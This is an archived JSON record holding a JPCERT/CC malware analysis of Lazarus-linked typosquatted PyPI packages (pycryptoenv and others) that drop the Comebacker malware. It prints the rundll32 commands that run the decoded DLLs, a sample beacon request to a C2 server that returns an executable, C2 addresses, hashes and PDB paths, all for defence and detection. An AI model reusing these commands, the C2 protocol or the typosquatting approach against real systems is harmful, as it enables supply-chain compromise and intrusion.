{
	"id": "9ab30ebd-164a-43c8-b540-423f2e26f96b",
	"created_at": "2026-04-06T15:53:35.728258Z",
	"updated_at": "2026-04-10T13:11:35.902857Z",
	"deleted_at": null,
	"sha1_hash": "6588c8cb5afa8adcc69f776861f62ddf905ea4a6",
	"title": "New Malicious PyPI Packages used by Lazarus - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2199813,
	"plain_text": "New Malicious PyPI Packages used by Lazarus - JPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2024-02-27 · Archived: 2026-04-06 15:36:48 UTC\r\nJPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI, the official Python\r\npackage repository (Figure 1). The Python packages confirmed this time are as follows:\r\npycryptoenv\r\npycryptoconf\r\nquasarlib\r\nswapmempool\r\nThe package names pycryptoenv and pycryptoconf are similar to pycrypto, which is a Python package used\r\nfor encryption algorithms in Python. Therefore, the attacker probably prepared the malware-containing malicious\r\npackages to target users' typos in installing Python packages.\r\nThis article provides details on these malicious Python packages.\r\nFigure 1: Python packages released by Lazarus attack group\r\nFile structure of the malicious Python packages\r\nSince the multiple malicious Python packages confirmed this time have almost the same file structure, this article\r\nuses pycryptoenv as an example in the following sections. The malicious Python package has the file structure\r\nhttps://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html\r\nPage 1 of 9\n\nshown in Figure 2. The main body of the malware is a file named test.py. This file itself is not Python but\r\nbinary data, which is an encoded DLL file.\r\nFigure 2: File structure of pycryptoenv\r\nThe code to decode and execute test.py is contained in __init__.py, as shown in Figure 3. The test.py is\r\nsimply an XOR-encoded DLL file, and it is decoded, saved as a file, and then executed by __init__.py.\r\nFigure 3: Code to decode and execute test.py\r\nThis type of malware, called Comebacker, is the same type as that used by Lazarus to target security researchers in\r\nan attack reported by Google [1] in January 2021. The following sections describe the details of test.py.\r\nDetails of test.py\r\nSince the code which calls the function to decode and execute test.py (the crypt function in Figure 3) does not\r\nexist in pycryptoenv, the malware cannot be executed simply by installing pycryptoenv. Therefore, the attacker\r\nprobably runs the Python script that executes the crypt function on the target machine in some way. The following\r\nsection describes the behavior when a function that decodes and executes test.py is run.\r\nFigure 4 shows the process from pycryptoenv to the execution of the malware main body.\r\nFigure 4: Flow up to Comebacker execution\r\nAfter test.py is XOR-decoded, it is saved as output.py and then executed as a DLL file by the following\r\ncommand.\r\n$ rundll32 output.py,CalculateSum\r\nThe DLL files IconCache.db and NTUSER.DAT are created and executed by the following command.\r\nNTUSER.DAT is encoded, and the decoded data is executed in memory; this data is the main body of\r\nComebacker.\r\nRUNDLL32.exe %APPDATA%\\..\\Roaming\\Microsoft\\IconCache.db,GetProcFunc %APPDATA%\\..\\Roaming\\Microsoft\\C\r\nThe samples confirmed this time have a fixed decode key as shown in Figure 5, and they are used to decode each\r\nfile.\r\nFigure 5: Decode Keys and Decode Functions\r\nIn addition, the NOP code used in this sample has a unique characteristic. As shown in Figure 6, there is an\r\ninstruction starting with 66 66 66 66 in the middle of the code. This is often used, especially in the decode and\r\nencode functions. This characteristic is also found in other types of malware used by Lazarus, including the malware\r\nBLINDINGCAN.\r\nFigure 6: Comparison of characteristic NOP commands between Comebacker and BLINDINGCAN\r\nDetails of Comebacker\r\nComebacker sends the following HTTP POST request to its C2 servers.\r\nPOST /manage/manage.asp HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .N\r\nHost: chaingrown.com\r\nContent-Length: 129\r\nCache-Control: no-cache\r\nNB=XMAFUUCARD\u0026GPETR=NTU1NTY0aHU0Z2psMkRhUA==\u0026FCKA=\u0026YUYRNT=0\u0026POCAYM=52\u0026PQWFQU=MgAwADIANAAtADAAMgAtADAA\r\nThe POST data consists of the following:\r\n[2 random characters]=[command (determined by string length)]\u0026[random character]=[device ID (base64 e\r\n*After receiving data from the server, it becomes \"yyyy-MM-dd hh:mm:ss|command (same as the first one\r\nIn response to the above data sent, the server sends back a Windows executable file (see Appendix A for details of\r\nthe received data format). Comebacker has a function to execute the received Windows executable file in\r\nmemory.\r\nAssociated Attacks\r\nPhylum has reported [2] a similar case to this attack in the past. In this case, an npm package contains Comebacker,\r\nand thus the attack is considered to have been conducted by Lazarus as well. In this way, the attacker aims to\r\nspread malware infections in multiple package repositories.\r\nFigure 7: npm package released by Lazarus attack group\r\nIn Closing\r\nThe malicious Python packages confirmed this time have been downloaded approximately 300 to 1,200 times\r\n(Figure 8). Attackers may be targeting users’ typos to have the malware downloaded. When you install modules\r\nand other kinds of software in your development environment, please do so carefully to avoid installing unwanted\r\npackages. For C2 and other information on the malware described in this article, please refer to the Appendix.\r\nFigure 8: Number of pycryptoenv downloads\r\nShusei Tomonaga\r\n(Translated by Takumi Nakano)\r\nReferences\r\n[1] Google: New campaign targeting security researchers\r\n　 https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/\r\n[2] Phylum: Crypto-Themed npm Packages Found Delivering Stealthy Malware\r\n　 https://blog.phylum.io/crypto-themed-npm-packages-found-delivering-stealthy-malware/\r\nAppendix A: Format of the received data\r\nTable A: Format of the received data\r\nOffset Content Notes\r\n0x00 Hex string Command\r\n0x05 Hex string End flag (reception ends if it is 3)\r\n0x07 Hex string Data length\r\n0x10 Data Base64 data with \"+\" replaced with space\r\nThe data format is as follows:\r\n[number(number to be included in the next POST data)]|[number(data size to receive)]|[Export function\r\nAppendix B: C2\r\nhttps://blockchain-newtech.com/download/download.asp\r\nhttps://fasttet.com/user/agency.asp\r\nhttps://chaingrown.com/manage/manage.asp\r\nhttp://91.206.178.125/upload/upload.asp\r\nAppendix C: Malware hash\r\npycryptoenv-1.0.7.tar.gz\r\n- b4a04b450bb7cae5ea578e79ae9d0f203711c18c3f3a6de9900d2bdfaa4e7f67\r\npycryptoenv-1.0.7-py3-none-any.whl\r\n- c56c94e21913b2df4be293001da84c3bb20badf823ccf5b6a396f5f49df5efff\r\npycryptoconf-1.0.6.tar.gz\r\n- 956d2ed558e3c6e447e3d4424d6b14e81f74b63762238e84069f9a7610aa2531\r\npycryptoconf-1.0.6-py3-none-any.whl\r\n- 6bba8f488c23a0e0f753ac21cd83ddeac5c4d14b70d4426d7cdeebdf813a1094\r\nquasarlib-1.0.8.tar.gz\r\n- 173e6bc33efc7a03da06bf5f8686a89bbed54b6fc8a4263035b7950ed3886179\r\nquasarlib-1.0.8-py3-none-any.whl\r\n- 3ab6e6fc888e4df602eff1c5bc24f3e976215d1e4a58f963834e5b225a3821f5\r\nswapmempool-1.0.8.tar.gz\r\n- 60c080a29f58cf861f5e7c7fc5e5bddc7e63dd1db0badc06729d91f65957e9ce\r\nswapmempool-1.0.8-py3-none-any.whl\r\n- 26437bc68133c2ca09bb56bc011dd1b713f8ee40a2acc2488b102dd037641c6e\r\nComebacker\r\n- 63fb47c3b4693409ebadf8a5179141af5cf45a46d1e98e5f763ca0d7d64fb17c\r\n- e05142f8375070d1ea25ed3a31404ca37b4e1ac88c26832682d8d2f9f4f6d0ae\r\nLoader\r\n- 01c5836655c6a4212676c78ec96c0ac6b778a411e61a2da1f545eba8f784e980\r\n- aec915753612bb003330ce7ffc67cfa9d7e3c12310f0ecfd0b7e50abf427989a\r\n- 85c3a2b185f882abd2cc40df5a1a341962bc4616bc78a344768e4de1d5236ab7\r\n- a4e4618b358c92e04fe6b7f94a114870c941be5e323735a2e5cd195138327f8f\r\n- a8a5411f3696b276aee37eee0d9bed99774910a74342bbd638578a315b65e6a6\r\n- 8fb6d8a5013bd3a36c605031e86fd1f6bb7c3fdba722e58ee2f4769a820b86b0\r\nAppendix D: PDB\r\nF:\\workspace\\CBG\\Loader\\npmLoaderDll\\x64\\Release\\npmLoaderDll.pdb\r\nF:\\workspace\\CBG\\npmLoaderDll\\x64\\Release\\npmLoaderDll.pdb\r\nD:\\workspace\\CBG\\Windows\\Loader\\npmLoaderDll\\x64\\Release\\npmLoaderDll.pdb\r\nF:\\workspace\\CBG\\Loader\\publicLoaderFirst\\x64\\Release\\publicLoaderFirst.pdb\r\nSource: https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html"
	],
	"report_names": [
		"lazarus_pypi.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775490815,
	"ts_updated_at": 1775826695,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6588c8cb5afa8adcc69f776861f62ddf905ea4a6.pdf",
		"text": "https://archive.orkl.eu/6588c8cb5afa8adcc69f776861f62ddf905ea4a6.txt",
		"img": "https://archive.orkl.eu/6588c8cb5afa8adcc69f776861f62ddf905ea4a6.jpg"
	}
}